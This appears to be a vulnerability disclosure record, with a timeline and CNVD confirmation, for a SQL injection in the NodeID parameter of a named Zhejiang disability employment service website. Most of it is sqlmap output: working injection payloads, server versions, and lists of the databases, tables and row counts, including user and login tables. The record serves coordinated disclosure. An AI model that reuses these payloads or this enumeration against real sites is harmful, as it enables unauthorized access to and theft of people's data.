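2015-05-18: Details reported to the vendor; awaiting vendor handling
2015-05-22: Vendor confirmed; details disclosed to the vendor only
2015-06-01: Details disclosed to core white hats and experts in related fields
2015-06-11: Details disclosed to regular white hats
2015-06-21: Details disclosed to trainee white hats
2015-07-06: Details disclosed to the public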
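As the title says.
Operated by the Zhejiang Provincial Employment Service Center for Persons with Disabilities; a GET injection exists at http://jyxx.zjdpf.org.cn/publish/index.php?NodeID=10&SiteID=4&page=1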
sqlmap identified the following injection points with a total of 235 HTTP(s) requests:
---
Parameter: NodeID (GET)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: NodeID=10 RLIKE (SELECT (CASE WHEN (1854=1854) THEN 10 ELSE 0x28 END))&SiteID=4&page=1

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: NodeID=10 AND (SELECT 4690 FROM(SELECT COUNT(*),CONCAT(0x7162716271,(SELECT (CASE WHEN (4690=4690) THEN 1 ELSE 0 END)),0x716b767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&SiteID=4&page=1

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: NodeID=10 AND SLEEP(5)&SiteID=4&page=1
---
web server operating system: Windows
web application technology: Apache 2.2.3, PHP 5.2.1
back-end DBMS: MySQL 5.0

available databases [6]:
[*] db_art
[*] db_cljyxxw
[*] db_cltgpt
[*] information_schema
[*] mysql
[*] temp_temp

Database: db_cljyxxw
[11 tables]
+--------------------------+
| ecms_content_article     |
| ecms_content_info        |
| ecms_content_law         |
| ecms_content_zpxx        |
| ecms_files               |
| ecms_nodes               |
| ecms_template_node       |
| ecms_visited_stat        |
| webinformation           |
| webinformationfile       |
| webinformationtype       |
+--------------------------+

Database: db_art
[37 tables]
+--------------------------+
| privileges               |
| user                     |
| ecms_content_article     |
| ecms_content_artshow     |
| ecms_content_fields      |
| ecms_content_info        |
| ecms_content_law         |
| ecms_content_tables      |
| ecms_content_zpxx        |
| ecms_extra_menu          |
| ecms_files               |
| ecms_interactive_letter  |
| ecms_interactive_priv    |
| ecms_interactive_setting |
| ecms_interactive_type    |
| ecms_node_priv           |
| ecms_nodes               |
| ecms_serial              |
| ecms_setup               |
| ecms_site_priv           |
| ecms_sites               |
| ecms_template_node       |
| ecms_visited_stat        |
| ecms_vote_limit          |
| ecms_vote_message        |
| ecms_vote_option         |
| ecms_vote_priv           |
| ecms_vote_question       |
| ecms_vote_subject        |
| ecms_vote_type           |
| log                      |
| login                    |
| map_priv                 |
| organ                    |
| role                     |
| user_organ               |
| user_role                |
+--------------------------+

Database: db_cltgpt
[29 tables]
+--------------------------+
| privileges               |
| user                     |
| ecms_content_article     |
| ecms_content_fields      |
| ecms_content_info        |
| ecms_content_law         |
| ecms_content_tables      |
| ecms_extra_menu          |
| ecms_files               |
| ecms_node_priv           |
| ecms_nodes               |
| ecms_serial              |
| ecms_setup               |
| ecms_site_priv           |
| ecms_sites               |
| ecms_template_node       |
| log                      |
| login                    |
| map_priv                 |
| news_info                |
| organ                    |
| role                     |
| tg_article               |
| tg_class                 |
| tg_image                 |
| tg_process               |
| tg_suggestion            |
| user_organ               |
| user_role                |
+--------------------------+

Database: db_cljyxxw
+--------------------------+---------+
| Table                    | Entries |
+--------------------------+---------+
| ecms_content_article     | 321     |
| ecms_content_info        | 321     |
| ecms_visited_stat        | 53      |
| ecms_nodes               | 50      |
| ecms_template_node       | 30      |
| ecms_files               | 29      |
+--------------------------+---------+

Database: db_art
+--------------------------+---------+
| Table                    | Entries |
+--------------------------+---------+
| ecms_visited_stat        | 5161    |
| ecms_node_priv           | 1001    |
| ecms_content_info        | 252     |
| ecms_content_article     | 217     |
| ecms_interactive_letter  | 65      |
| ecms_template_node       | 44      |
| ecms_nodes               | 43      |
| ecms_content_artshow     | 35      |
| ecms_site_priv           | 33      |
| `privileges`             | 31      |
| ecms_content_fields      | 27      |
| map_priv                 | 24      |
| ecms_interactive_priv    | 22      |
| ecms_vote_priv           | 10      |
| `user`                   | 5       |
| ecms_files               | 5       |
| user_organ               | 5       |
| user_role                | 5       |
| ecms_content_tables      | 4       |
| ecms_extra_menu          | 2       |
| ecms_interactive_type    | 2       |
| ecms_sites               | 2       |
| ecms_vote_option         | 2       |
| organ                    | 2       |
| role                     | 2       |
| ecms_interactive_setting | 1       |
| ecms_vote_question       | 1       |
| ecms_vote_subject        | 1       |
| ecms_vote_type           | 1       |
| login                    | 1       |
+--------------------------+---------+

Database: db_cltgpt
+--------------------------+---------+
| Table                    | Entries |
+--------------------------+---------+
| tg_article               | 5589    |
| tg_image                 | 4899    |
| tg_process               | 3991    |
| ecms_nodes               | 152     |
| organ                    | 121     |
| `user`                   | 115     |
| user_organ               | 114     |
| map_priv                 | 77      |
| tg_class                 | 36      |
| ecms_node_priv           | 33      |
| `privileges`             | 24      |
| ecms_content_fields      | 14      |
| ecms_site_priv           | 11      |
| user_role                | 11      |
| login                    | 6       |
| ecms_content_article     | 5       |
| ecms_content_info        | 5       |
| ecms_template_node       | 5       |
| role                     | 3       |
| ecms_content_tables      | 2       |
| ecms_extra_menu          | 1       |
| ecms_sites               | 1       |
| news_info                | 1       |
+--------------------------+---------+
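Severity: Medium
Vulnerability Rank: 10
Confirmed at: 2015-05-22 19:09
CNVD has confirmed and reproduced the vulnerability as described and has passed it via CNCERT to the Zhejiang sub-center, which will coordinate follow-up handling with the organization that manages the website.
None at this time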